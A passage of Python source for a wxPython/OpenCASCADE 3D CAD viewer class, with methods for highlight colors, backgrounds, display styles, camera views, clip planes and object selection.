self._subshape_selection_color[0]\n\n @subshape_selection_color.setter\n def subshape_selection_color(self, color):\n \"\"\"Set selection color.\n\n :param color: color to show on selection, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n self._subshape_selection_color = (color, q_color)\n\n # we create a new drawer. This will force the current boundary\n # edge color to remain intact\n drawer = Prs3d_Drawer().handle\n drawer.SetColor(q_color)\n # Set the display mode to whatever is active now. This means that in\n # shaded mode the faces will be highlighted. In wireframe the edges\n # will be highlighted.\n drawer.SetDisplayMode(-1)\n\n self._ais_context.SetHighlightStyle(\n Prs3d_TypeOfHighlight_LocalSelected, drawer)\n\n @property\n def highlight_color(self):\n return self._highlight_color[0]\n\n @highlight_color.setter\n def highlight_color(self, color):\n \"\"\"Set selection color.\n\n :param color: color to show on selection, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n style = self._ais_context.HighlightStyle()\n style.SetColor(q_color)\n style.SetDisplayMode(0) # wireframe\n self._highlight_color = (color, q_color)\n\n @property\n def subshape_highlight_color(self):\n return self._subshape_highlight_color[0]\n\n @subshape_highlight_color.setter\n def subshape_highlight_color(self, color):\n \"\"\"Set selection color.\n\n :param color: color to show on selection, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n style = self._ais_context.HighlightStyle(\n Prs3d_TypeOfHighlight_LocalDynamic)\n style.SetColor(q_color)\n style.SetDisplayMode(0) # wireframe\n self._subshape_highlight_color = (color, q_color)\n\n def init_triedron(self):\n white = Quantity_Color(Quantity_NOC_WHITE)\n return self._v3d_view.TriedronDisplay(\n Aspect_TOTP_RIGHT_LOWER, white, self.TRIEDRON_SCALE, V3d_ZBUFFER)\n\n def init_keymap(self):\n # beware: evt.GetKeyCode() capitalizes keys, so pressing 'w' -> 'W'.\n self._keymap = {\n ord('W'): self.OnKeyW,\n ord('S'): self.OnKeyS,\n ord('F'): self.OnKeyF,\n ord('C'): self.OnKeyC,\n ord('Q'): self.OnKeyQ,\n ord('A'): self.OnKeyA,\n # 127 matches DEL button on Win64\n 127: self.OnKeyDEL,\n # xxx matches ESC button on Win64\n 27: self.onKeyESC\n }\n\n def init_dc(self):\n self._dc = dc = wx.ClientDC(self)\n # color = wx.Colour(73, 149, 209) # ParaPy Blue\n color = wx.BLACK\n pen = wx.Pen(color, 1, wx.LONG_DASH)\n dc.SetPen(pen)\n # dc.SetPen(wx.GREY_PEN)\n # dc.SetBackgroundMode(wx.TRANSPARENT)\n # dc.SetBrush(wx.TRANSPARENT_BRUSH)\n\n # TODO (RvD): Does this take effect one already displayed objects?\n def set_isos(self, u, v):\n if u == v:\n self._ais_context.SetIsoNumber(u, AIS_TOI_Both)\n else:\n self._ais_context.SetIsoNumber(u, AIS_TOI_IsoU)\n self._ais_context.SetIsoNumber(v, AIS_TOI_IsoV)\n\n def set_display_mode_shaded(self, update=True):\n self._v3d_view.SetComputedMode(False)\n self._ais_context.SetDisplayMode(AIS_Shaded, update)\n self.update_selected()\n\n def set_display_mode_wireframe(self, update=True):\n self._v3d_view.SetComputedMode(False)\n self._ais_context.SetDisplayMode(AIS_WireFrame, update)\n self.update_selected()\n\n def set_display_mode_hlr(self):\n self._v3d_view.SetComputedMode(True)\n self.update_selected()\n\n def activate_grid(self, xorig, yorig, zorig, width, length, xstep, ystep,\n angle=0, mode=\"lines\"):\n \"\"\"Activate a rectangular grid. ``xorig`` and ``yorig`` define the\n origin of the grid. ``xstep`` defines the interval between 2\n vertical lines. ``ystep`` defines the interval between 2 horizontal\n lines. ``angle`` defines the rotation angle of the grid. ``width``\n and ``length`` define the dimensions of the grid.\n\n :param float xorig: X-coordinate of grid\n :param float yorig: Y-coordinate of grid\n :param float zorig: Z-coordinate of grid\n :param float width: width of grid\n :param float length: length of grid\n :param float xstep: interval between 2 vertical lines\n :param float ystep: interval between 2 horizontal lines\n :param float angle: rotation angle of grid\n :param str | None mode: either 'lines', 'points' or None.\n \"\"\"\n mode = self.py_Aspect_GridDrawMode[mode]\n v3d_viewer = self._v3d_viewer\n v3d_viewer.ActivateGrid(Aspect_GT_Rectangular, mode)\n # for some reason OCC takes half-width and half-length inputs.\n v3d_viewer.SetRectangularGridGraphicValues(width / 2., length / 2.,\n zorig)\n # for some reason, x and y are reversed in OCC.\n v3d_viewer.SetRectangularGridValues(-xorig, -yorig, xstep, ystep,\n angle)\n\n def deactivate_grid(self):\n self._v3d_viewer.DeactivateGrid()\n\n def reset_background(self, update=True):\n if self._bg_mode == \"uniform\":\n self._v3d_view.SetBackgroundColor(self._default_background_color)\n if update:\n self.update()\n elif self._bg_mode == \"gradient\":\n white = Quantity_Color(Quantity_NOC_WHITE)\n black = Quantity_Color(Quantity_NOC_BLACK)\n self._v3d_view.SetBgGradientColors(white, black,\n Aspect_GFM_NONE, update)\n elif self._bg_mode == \"image\":\n self._v3d_view.SetBackgroundImage(\n self._bg_image, Aspect_FM_NONE, update)\n self._bg_image = None\n self._bg_mode = None\n\n def set_background_color(self, color, update=True):\n \"\"\"Set uniformly colored background:\n\n >>> self.set_background_color(\"white\")\n >>> self.set_background_color((255, 255, 255))\n \"\"\"\n if self._bg_mode == \"gradient\" or self._bg_mode == \"image\":\n self.reset_background(False)\n self._v3d_view.SetBackgroundColor(py_QuantityColor(color))\n if update:\n self.update()\n self._bg_mode = \"uniform\"\n\n def set_background_color_gradient(self, color1, color2, style=\"vertical\",\n update=True):\n \"\"\"Set background of viewer with gradient from top ``color1`` to\n bottom ``color2``.\n\n >>> self.set_background_color_gradient(\"white\", \"black\")\n >>> self.set_background_color_gradient((255, 255, 255), (0, 0, 0))\n\n :type color1: str | (float, float, float)\n :type color2: str | (float, float, float)\n :param style: valid values are (None, \"horizontal\", \"vertical\",\n \"diag1\", \"diag2\", \"corner1\", \"corner2\", \"corner3\", \"corner4\")\n :param bool update: update viewer immediately?\n \"\"\"\n if self._bg_mode == \"image\":\n self.reset_background(False)\n style = self.py_Aspect_GradientFillMethod[style]\n self._v3d_view.SetBgGradientColors(py_QuantityColor(color1),\n py_QuantityColor(color2),\n style, update)\n self._bg_mode = \"gradient\"\n\n def set_background_image(self, pathname, style=\"centered\", update=True):\n \"\"\"Set background image, either .gif, .bmp or .xwd format.\n\n >>> self.set_background_image(\"path/to/image.bmp\")\n\n :param str pathname: path to image\n :param style: valid values are (None, \"centered\", \"tiled\", \"stretched\")\n :param bool update: update viewer immediately?\n \"\"\"\n pathname = os.path.abspath(pathname)\n if not os.path.isfile(pathname):\n raise RuntimeError(\n \"Background image '{}' does not exist\".format(pathname))\n if self._bg_mode == \"gradient\":\n self.reset_background(False)\n style = self.py_Aspect_FillMethod[style]\n self._v3d_view.SetBackgroundImage(pathname, style, update)\n self._bg_mode = \"image\"\n self._bg_image = pathname\n\n def set_camera(self, camera, update=True):\n \"\"\"Set the camera of the viewer to ``camera``.\n\n :param Camera camera: Camera position and settings that should be\n applied to the Viewer.\n :param bool update: Should we update the Viewer?\n \"\"\"\n prev_aspect = self.camera.aspect_ratio\n\n # update view\n self.camera.copy_from_camera(camera)\n\n if prev_aspect != camera.aspect_ratio:\n # If the aspect ratio from the given camerea is different than that\n # of the screen, we need to resize\n self._v3d_view.MustBeResized()\n\n if update:\n self.update()\n\n def get_camera(self, copy=True):\n \"\"\"Return :attr:`camera` or a ``copy`` of it. The latter is useful\n when you do not want the returned camera to change when the current\n view changes, or vice-versa.\n\n :param bool copy: if set to :py:`True` returns a copy of the camera.\n :rtype: Camera\n \"\"\"\n if copy:\n camera = Camera()\n camera.copy_from_camera(self.camera)\n return camera\n else:\n return self.camera\n\n def fit_all(self):\n v3d_view = self._v3d_view\n v3d_view.ZFitAll()\n v3d_view.FitAll()\n\n def hide(self, obj, update=True, fit=False):\n # don't update twice (fit will also update)\n self._ais_context.Erase(obj, False if fit else update)\n if fit:\n self.fit_all()\n\n def hide_all(self, update=True):\n self._ais_context.EraseAll(update)\n\n def hide_selected_objects(self, update=True, fit=False):\n # don't update twice (fit will also update)\n update = False if fit else update\n self._ais_context.EraseSelected(update)\n if fit:\n self.fit_all()\n\n def update(self):\n \"\"\"Redraw OCC V3D_View.\"\"\"\n self._v3d_view.Redraw()\n\n def move_to(self, x, y):\n \"\"\"Relays mouse position in pixels ``x`` and ``y`` to the interactive\n context selectors.\n\n :rtype: int\n :returns: AIS_StatusOfDetection\n \"\"\"\n return self._ais_context.MoveTo(x, y, self._v3d_view, True)\n\n def move_to_current_mouse_position(self):\n \"\"\"Relays current mouse position to the interactive context selectors.\n\n :rtype: int\n :returns: AIS_StatusOfDetection\n \"\"\"\n screen_pos = wx.GetMousePosition()\n x, y = self.ScreenToClient(screen_pos)\n return self.move_to(x, y)\n\n update_selector = move_to_current_mouse_position\n\n def display(self, obj, update=True, fit=True):\n # prevent updating twice, fit will do this already\n self._ais_context.Display(obj, False if fit else update)\n if fit:\n self.fit_all()\n return obj\n\n # TODO (TBD): investigate if AIS_Shape can still be used and render edges.\n def display_topods_shape(self, topods_shape, **kwargs):\n # ais_shape = AIS_Shape(topods_shape).handle\n obj = make_ais_coloredshape(topods_shape)\n return self.display(obj, **kwargs)\n\n def display_text(self, text, pt, top_most=False, height=None, **kwargs):\n obj = make_ais_text_label(text, pt, top_most=top_most, height=height)\n return self.display(obj, **kwargs)\n\n def display_trihedron(self, pt, vz=(0, 0, 1), vx=(1, 0, 0),\n size=None, zoom_persistent=False,\n keep_on_top=False, display_mode=None,\n **kwargs):\n display_mode = display_mode or \\\n self.DEFAULT_TRIHEDRON_DISPLAY_MODE\n size = size or 1\n obj = make_ais_trihedron(pt, vz=vz, vx=vx, size=size,\n zoom_persistent=zoom_persistent,\n keep_on_top=keep_on_top,\n display_mode=display_mode)\n return self.display(obj, **kwargs)\n\n def display_all(self, update=True, fit=False):\n # prevent updating twice, fit will do this already\n self._ais_context.DisplayAll(False if fit else update)\n if fit:\n self.fit_all()\n\n def remove(self, obj, update=True, fit=True):\n # prevent updating twice, fit will do this already\n self._ais_context.Remove(obj, False if fit else update)\n if fit:\n self.fit_all()\n\n def remove_all(self, update=True):\n self._ais_context.RemoveAll(update)\n\n def apply_style(self, obj, color=None, transparency=None,\n display_mode=None, line_thickness=None,\n deviation_coefficient=None, u_isos=None, v_isos=None,\n display_priority=None, mesh_vertex_color=None,\n mesh_edge_color=None, mesh_face_color=None, update=True):\n \"\"\"Apply display style to ``obj``.\n\n one can unset values by passing \"Viewer.UNSET_STYLE\". Although this\n does currently not work for display_priority.\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to display in viewer\n :param (float, float, float) | str | None color: color of ``obj``\n :param float | None | Viewer._UnsetStyle transparency: between 0.0 (\n opaque) - 1.0 (fully transparent)\n :param str | None display_mode: 'wireframe' -> AIS_WireFrame |\n 'shaded' -> AIS_Shaded\n :param int | None | Viewer._UnsetStyle line_thickness: >= 1\n :param float | None | Viewer._UnsetStyle deviation_coefficient: > 0.0\n :param int | Viewer._UnsetStyle u_isos: number of isolines in u-direction\n :param int | Viewer._UnsetStyle v_isos: number of isolines in vdirection\n :param (float, float, float) | str | None mesh_face_color: color of\n mesh faces\n :param (float, float, float) | str | None mesh_edge_color: color of\n mesh edges\n :param (float, float, float) | str | None mesh_vertex_color: color of\n mesh vertices\n :param int | str | None display_priority: display priority of ``obj``\n (default is 5)\n :param bool update: redisplay the object?\n \"\"\"\n context = self._ais_context\n redisplay = False\n UNSET = Viewer.UNSET_STYLE\n\n if isinstance(obj, Handle_MeshVS_Mesh):\n # after .SetColor(), redisplay to have color change take effect.\n new_colors = [mesh_face_color, mesh_edge_color, mesh_vertex_color]\n if any(new_colors):\n redisplay = True\n drawer = obj.GetDrawer()\n \"\"\":type: OCC.MeshVS.MeshVS_Drawer\"\"\"\n\n color_flags = (MeshVS_DA_InteriorColor,\n MeshVS_DA_EdgeColor, MeshVS_DA_MarkerColor)\n\n if UNSET in new_colors:\n # reset the colors, set the colors again which were None\n get_color = drawer.GetColor\n old_colors = (get_color(flag) for flag in color_flags)\n\n for old_color, i, new_color in zip(old_colors,\n *enumerate(new_colors)):\n if new_color is None:\n # no new value given, so we reset the old value\n new_colors[i] = old_color\n elif new_color is UNSET:\n # we not set these after reset\n new_colors[i] = None\n\n obj.UnsetColor() # reset all colors to defaults\n\n set_color = drawer.SetColor\n for flag, color in zip(color_flags, new_colors):\n if color:\n set_color(flag, py_QuantityColor(color))\n\n if display_mode is not None:\n # FIXME (TBD): when using SetDisplayMode(), context.Redisplay()\n # /fixme or context.Update() do not reflect change. Drastic\n # /fixme way for now is to Remove shape entirely.\n was_dislayed = False\n if context.IsDisplayed(obj):\n context.Remove(obj, False)\n was_dislayed = True\n\n if display_mode is UNSET:\n obj.UnsetDisplayMode()\n else:\n mode = self.py_DisplayModeMesh[display_mode]\n obj.SetDisplayMode(mode)\n\n if was_dislayed:\n context.Display(obj, False)\n redisplay = False\n\n else: # normal InteractiveObject that is not a mesh\n if color:\n color = py_QuantityColor(color)\n context.SetColor(obj, color, False)\n\n # FIXME (RvD): Boundary edges in front of non-transparent object,\n # /fixme are hidden. See also:\n # /fixme https://tracker.dev.opencascade.org/view.php?id=27716\n if transparency: # filters out None and 0.0\n if transparency is UNSET:\n context.UnsetTransparency(obj, False)\n else:\n context.SetTransparency(obj, transparency, False)\n\n if line_thickness is not None:\n if line_thickness is UNSET:\n context.UnsetWidth(obj, False)\n else:\n context.SetWidth(obj, line_thickness, False)\n\n if display_mode is not None:\n if display_mode is UNSET:\n context.UnsetDisplayMode(obj, False)\n else:\n mode = self.py_DisplayMode[display_mode]\n context.SetDisplayMode(obj, mode, False)\n\n if deviation_coefficient is not None:\n if deviation_coefficient is UNSET:\n deviation_coefficient = self._DEFAULT_DEVIATION_COEFFICIENT\n elif deviation_coefficient < 1.0e-5:\n msg = (\"a deviation_coefficient of {:} is very small, \"\n \"expect delays...\")\n self.logger.warning(msg.format(deviation_coefficient))\n # display_context.SetDeviationAngle(h_AIS_InteractiveObject,\n # deflection, False)\n context.SetDeviationCoefficient(obj, deviation_coefficient,\n False)\n\n if u_isos is not None or v_isos is not None:\n drawer = obj.Attributes()\n \"\"\":type: OCC.Prs3d.Handle_Prs3d_Drawer\"\"\"\n\n for num_isos, set_iso in ((u_isos, drawer.SetUIsoAspect),\n (v_isos, drawer.SetVIsoAspect)):\n if num_isos is not None:\n iso_aspect = self._new_isoaspect(\n num_lines=0 if num_isos is UNSET else num_isos)\n set_iso(iso_aspect)\n redisplay = True\n\n # TODO (TBD): No obvious \"UNSET\" possible for display priority.\n # /todo Setting a display priority modifies the display priority\n # /todo for all its children.\n if display_priority is not None:\n if display_priority is UNSET:\n msg = (\"Unsetting the display priority is currently not \"\n \"supported. Nothing will happen.\")\n self.logger.warning(msg)\n else:\n context.SetDisplayPriority(obj, display_priority)\n\n if redisplay:\n self._ais_context.Redisplay(obj, update, False) # all_modes=False?\n elif update:\n self.update()\n\n def _new_isoaspect(self, color=Quantity_NOC_GRAY75,\n line_type=Aspect_TOL_SOLID,\n line_width=0.5,\n num_lines=0):\n quantity_color = Quantity_Color(color)\n return Prs3d_IsoAspect(quantity_color, line_type, line_width,\n num_lines).handle\n\n def reset_style(self, obj, update=True):\n \"\"\"Reset style of Handle_AIS_InteractiveObject ``obj``.\n\n :type obj: OCC.AIS.Handle_AIS_InteractiveObject\n \"\"\"\n priority = self.DEFAULT_DISPLAY_PRIORITY\n context = self._ais_context\n obj.UnsetAttributes()\n context.SetDisplayPriority(obj, priority)\n context.Redisplay(obj, update, False) # all_modes=False?\n\n def get_style(self, obj):\n \"\"\"Return dict with all kwargs from apply_style():\n\n {'color': (198, 145, 29),\n 'transparency': 0.0,\n 'line_thickness': 1,\n 'deviation_coefficient': 0.001,\n 'display_mode': 'shaded',\n 'display_priority': 5,\n 'u_isos': 0,\n 'v_isos': 0}\n\n :rtype: dict[str, T]\n \"\"\"\n dct = {}\n context = self._ais_context\n drawer = obj.Attributes()\n\n color = Quantity_Color()\n context.Color(obj, color)\n\n dct['color'] = QuantityColor_rgb(color)\n dct['transparency'] = obj.Transparency()\n dct['line_thickness'] = obj.Width() or 1.0\n # FIXME (PP): AIS_InteractiveObject.DisplayMode missing.\n # dct['display_mode'] = self.DisplayMode_py[obj.DisplayMode()]\n\n if obj.DynamicType().Name() == \"AIS_Shape\":\n # downcast to AIS_Shape, otherwise it does not have\n # OwnDeviationCoefficient\n shape_obj = Handle_AIS_Shape(obj)\n assert not shape_obj.IsNull() # casting should be a success\n else:\n shape_obj = obj\n\n try:\n meth = shape_obj.OwnDeviationCoefficient\n except AttributeError:\n dct['deviation_coefficient'] = context.DeviationCoefficient()\n else:\n flag, coef, prev_coef = meth()\n if flag:\n dct['deviation_coefficient'] = coef\n else:\n dct['deviation_coefficient'] = context.DeviationCoefficient()\n\n if obj.HasDisplayMode():\n display_mode = obj.DisplayMode()\n else:\n display_mode = context.DisplayMode()\n dct['display_mode'] = self.DisplayMode_py[display_mode]\n dct['display_priority'] = context.DisplayPriority(obj)\n dct['u_isos'] = drawer.UIsoAspect().Number()\n dct['v_isos'] = drawer.VIsoAspect().Number()\n\n return dct\n\n # X+ side\n def view_right(self, fit=True):\n self._set_view(V3d_Xpos, fit=fit)\n\n # X- side\n def view_left(self, fit=True):\n self._set_view(V3d_Xneg, fit=fit)\n\n # Y- side\n def view_front(self, fit=True):\n self._set_view(V3d_Yneg, fit=fit)\n\n # Y+ side\n def view_back(self, fit=True):\n self._set_view(V3d_Ypos, fit=fit)\n\n # Z+ side\n def view_top(self, fit=True):\n self._set_view(V3d_Zpos, fit=fit)\n\n # Z- side\n def view_bottom(self, fit=True):\n self._set_view(V3d_Zneg, fit=fit)\n\n # isometric view\n def view_iso(self, fit=True):\n self._set_view(V3d_XposYposZpos, fit=fit)\n\n def _set_view(self, v3d_orientation, fit=True):\n self._v3d_view.SetProj(v3d_orientation)\n if fit:\n self.fit_all()\n\n def remove_clipplanes(self):\n for pln in self._clipplanes:\n self._v3d_view.RemoveClipPlane(pln)\n\n def add_clipplane(self, point, direction):\n \"\"\"Example: ``add_clipplane((0, 0, 0), (0, 0, 1))``.\n\n :type point: (float, float, float)\n :type direction: (float, float, float)\n \"\"\"\n pln = gp_Pln(gp_Pnt(*point), gp_Dir(*direction))\n pln = Graphic3d_ClipPlane(pln).handle\n self._v3d_view.AddClipPlane(pln)\n self._clipplanes.append(pln)\n\n def select(self, obj, shift=False, update=True):\n \"\"\"Select ``obj`` and highlight it in viewer (if displayed).\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to select\n :param bool shift: If set to `True`, appends `obj` to the\n current selection (unless it was already selected, in which case\n the object is deselected). If set to `False`, `obj` will be\n selected and all previously selected items will be deselected.\n :param bool update: update the viewer?\n \"\"\"\n context = self._ais_context\n if shift:\n context.AddOrRemoveSelected(obj, update)\n else:\n # we need to clear selected because SetSelected ADDS objects\n # to the selection for this specific overload\n context.ClearSelected(False)\n context.SetSelected(obj, update)\n\n def update_selected(self, update=True):\n \"\"\"Syncs the selection-highlighting with the actual state of what is\n selected/unselected in the viewer. Sometimes this can get out of\n sync by adding new items to the selection, or removing the\n highlighting of items.\n \"\"\"\n self._ais_context.UpdateSelected(update)\n\n def deselect(self, obj, update=True):\n context = self._ais_context\n if context.IsSelected(obj):\n context.AddOrRemoveSelected(obj, update)\n\n def select_under_mouse(self, pos, shift=False, update=True):\n \"\"\"Select object under current mouse position, if any. If ``shift`` is\n True, adds the currently selected to :attr:`selected_objects`. If\n currently selected was already selected, it will be remove from\n :attr:`selected_objects`. If ``update``, viewer will be updated to\n show object as selected.\n\n :param tuple[float, float] pos: mouse position x, y\n :param bool shift: shift-selection\n :param bool update: update viewer after selection.\n :rtype: AIS_StatusOfPick\n \"\"\"\n # Forcefully refresh detected. It might be that some things were\n # erased, but we did not move. Then the erased objects\n # are still in detected, causing a bug, for instance with double\n # erases, or ghost-selections.\n x, y = pos\n ais_context = self._ais_context\n self.move_to(x, y)\n\n if shift:\n return ais_context.ShiftSelect(update)\n else:\n return ais_context.Select(update)\n\n def select_area(self, x1, y1, x2, y2, shift=False, update=True):\n \"\"\"Select all object(s) that are fully inside the rectangle bound by\n top-left corner ``(x1, y1)`` and bottom-right corner ``(x2, y2)``. If\n ``shift`` is True, adds the current selection to\n :attr:`selected_objects`. Member inside the current selection that\n were already selected, will be removed from :attr:`selected_objects`.\n If ``update``, viewer will be updated to show objects as selected.\n\n :param bool shift: shift-selection\n :param bool update: update viewer after selection.\n :rtype: AIS_StatusOfPick\n \"\"\"\n if shift:\n return self._ais_context.ShiftSelect(x1, y1, x2, y2,\n self._v3d_view, update)\n else:\n return self._ais_context.Select(x1, y1, x2, y2,\n self._v3d_view, update)\n\n def is_selected(self, obj):\n return bool(self._ais_context.IsSelected(obj))\n\n def select_all(self, update=True):\n context = self._ais_context\n # segfaults...\n # context.DisplayActiveSensitive(self._v3d_view)\n for obj in self.yield_displayed():\n if not context.IsSelected(obj):\n context.AddOrRemoveSelected(obj, False)\n if update:\n self.update()\n\n def deselect_all(self, update=True):\n self._ais_context.ClearSelected(update)\n\n @property\n def detected(self):\n \"\"\"List all detected objects in viewer.\n\n :rtype: list[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n return list(self.yield_detected())\n\n @property\n def selected(self):\n \"\"\"List all selected objects in viewer.\n\n :rtype: list[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n return list(self.yield_selected())\n\n @property\n def nb_selected(self):\n \"\"\"Number of selected items.\n\n A faster alternative to `len(viewer.selected)`, although it will still\n loop over all the elements (on C++ side).\n \"\"\"\n return self._ais_context.NbSelected()\n\n @property\n def displayed(self):\n \"\"\"List all displayed objects in viewer.\n\n :rtype: list[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n return list(self.yield_displayed())\n\n @concurrency_guard(\"detected\")\n def yield_detected(self):\n \"\"\"Yield currently detected objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n context = self._ais_context\n context.InitDetected() # supports only iteration being active at once\n while context.MoreDetected():\n # DetectedInteractive seems to be broken and only return the\n # topmost detected instance hence the work-around below\n owner = context.DetectedCurrentOwner()\n selectable = owner.Selectable()\n ais = Handle_AIS_InteractiveObject.DownCast(selectable)\n if ais.IsNull():\n # Either the selectable wasn't an interactive object, or\n # the detected entity was Null itself. This shouldn't happen\n # but not 100% sure about that...\n self.logger.debug(f\"Cannot downcast detected selectable \"\n f\"to Handle_AIS_InteractiveObject! \"\n f\"owner: {owner!r}, \"\n f\"selectable: {selectable!r}.\")\n else:\n yield ais\n context.NextDetected()\n\n @concurrency_guard(\"detected\")\n def yield_detected_with_owner(self):\n \"\"\"Generate detected (currently under the cursor) shapes with the\n AIS object that owns them inside the :class:`Viewer`.\n\n Format::\n\n (shape, owner)\n (shape, owner)\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the detected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.Generator[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n context = self._ais_context\n context.InitDetected() # supports only iteration being active at once\n while context.MoreDetected():\n select_owner = context.DetectedCurrentOwner()\n shape = self._get_selected_shape(select_owner)\n selectable = select_owner.Selectable()\n ais = Handle_AIS_InteractiveObject.DownCast(selectable)\n if ais.IsNull():\n # Either the selectable wasn't an interactive object, or\n # the detected entity was Null itself. This shouldn't happen\n # but not 100% sure about that...\n self.logger.debug(f\"Cannot downcast detected selectable \"\n f\"to Handle_AIS_InteractiveObject! \"\n f\"owner: {select_owner!r}, \"\n f\"selectable: {selectable!r}.\")\n else:\n yield shape, ais\n context.NextDetected()\n\n @property\n def detected_with_owner(self):\n \"\"\"Return a list of detected (currently under the cursor) shapes with\n the AIS object that owns them inside the :class:`Viewer`.\n\n Format::\n\n [(shape, owner), (shape, owner)]\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the detected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.List[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n return list(self.yield_detected_with_owner())\n\n def yield_displayed(self):\n \"\"\"Yield currently displayed objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n lst = AIS_ListOfInteractive()\n self._ais_context.DisplayedObjects(lst)\n for ais in lst:\n # ATTENTION: take another handle to own this reference,\n # AIS_ListOfInteractive will Nullify() original handle on gc\n yield Handle_AIS_InteractiveObject(ais)\n\n def yield_hidden(self):\n \"\"\"Yield currently hidden (erased) objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n lst = AIS_ListOfInteractive()\n self._ais_context.ErasedObjects(lst)\n for ais in lst:\n # ATTENTION: take another handle to own this reference,\n # AIS_ListOfInteractive will Nullify() original handle on gc\n yield Handle_AIS_InteractiveObject(ais)\n\n def is_hidden(self, ais: Handle_AIS_InteractiveObject) -> bool:\n \"\"\"Return `True` if `ais` is `in_viewer` and hidden. \"\"\"\n return self._ais_context.DisplayStatus(ais) == AIS_DS_Erased\n\n def in_viewer(self, ais: Handle_AIS_InteractiveObject) -> bool:\n \"\"\"Return `True` if `ais` is in a way (hidden/displayed/\n temporarily) in the Viewer.\n \"\"\"\n return self._ais_context.DisplayStatus(ais) != AIS_DS_None\n\n @concurrency_guard(\"selected\")\n def yield_selected(self):\n \"\"\"Yield currently selected objects in viewer.\n\n :rtype: collections.Iterable[OCC.AIS.AIS_InteractiveObject]\n \"\"\"\n context = self._ais_context\n context.InitSelected() # supports only iteration being active at once\n while context.MoreSelected():\n yield context.SelectedInteractive()\n context.NextSelected()\n\n def _get_selected_shape(\n self, select_owner: \"OCC.wrapper.SelectMgr.SelectMgr_EntityOwner\"):\n brep_owner = Handle_StdSelect_BRepOwner.DownCast(select_owner)\n if brep_owner.IsNull(): # not a BRepOwner, so it does not have a shape\n msg = (f\"Could not retrieve the selected shape! \"\n f\"Selected owner is not a BRepOwner. selected \"\n f\"owner: {select_owner!r}. Object: {self!r}\")\n self.logger.warning(msg)\n elif not brep_owner.HasShape():\n msg = (f\"Could not retrieve the selected shape! \"\n f\"Selected owner does not have a shape: \"\n f\"{brep_owner!r}. Object: {self!r}\")\n self.logger.warning(msg)\n else:\n return brep_owner.Shape()\n\n return None\n\n @concurrency_guard(\"selected\")\n def yield_selected_with_owner(self):\n \"\"\"Generate a list selected shapes with the AIS object that owns\n them inside the :class:`Viewer`.\n\n Format::\n\n (shape, owner)\n (shape, owner)\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the selected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.Generator[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n context = self._ais_context\n context.InitSelected() # supports only iteration being active at once\n while context.MoreSelected():\n select_owner = context.SelectedOwner()\n shape = self._get_selected_shape(select_owner)\n owner = context.SelectedInteractive()\n yield shape, owner\n context.NextSelected()\n\n @property\n def selected_with_owner(self):\n \"\"\"Return a list of selected shapes with the AIS object that owns\n them inside the :class:`Viewer`.\n\n Format::\n\n [(shape, owner), (shape, owner)]\n\n If the first element of the tuple is a shape, it is a sub-shape\n of the shape related to the owner (the second element of the tuple).\n\n When the selected entity does not have a shape, the first element\n of the tuple will be `None`, and one should look at the AIS object\n (the owner).\n\n :rtype: typing.List[typing.Tuple[typing.Union[OCC.wrapper.TopoDS.TopoDS_Shape, None], OCC.wrapper.AIS.Handle_AIS_InteractiveObject]]\n \"\"\"\n return list(self.yield_selected_with_owner())\n\n def is_displayed(self, obj):\n \"\"\"Returns true if ``obj`` is currently displayed.\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to test\n :rtype: bool\n \"\"\"\n return self._ais_context.IsDisplayed(obj)\n\n def zoom(self, factor):\n \"\"\"Zoom by ``factor``:\n\n - Zoom out: 0 < factor < 1.\n - Zoom in: 1 < factor.\n\n :param float factor: 0 < factor\n \"\"\"\n self._v3d_view.SetZoom(factor)\n\n def fit_window(self, x1, y1, x2, y2):\n \"\"\"Fit window between pixels.\"\"\"\n self._v3d_view.WindowFit(x1, y1, x2, y2)\n\n def is_highlighted(self, obj):\n return self._ais_context.IsHilighted(obj)\n\n def highlight(self, obj, color=None, fill_color=None,\n display_mode=None, ensure_visible=False, update=True):\n \"\"\"Highlight ``obj``, optionally with ``color``, in the viewer.\n\n Return `True` if the object was indeed highlighted, `False` otherwise.\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to highlight\n :param str|(int, int, int)|int|None color: highlight color\n :param str|(int, int, int)|int|None fill_color: Color the face\n should get (does not work with an edges-only `display_mode`\n like `wireframe`)\n :param str display_mode: How should the object be displayed on\n highlighting? In addition to 'wireframe' and 'shaded', there is\n also a 'default' display mode which defaults to the currently\n active Viewer display_mode. (Default: `None` which implies\n 'wireframe')\n :param bool ensure_visible: If set to `True` makes sure 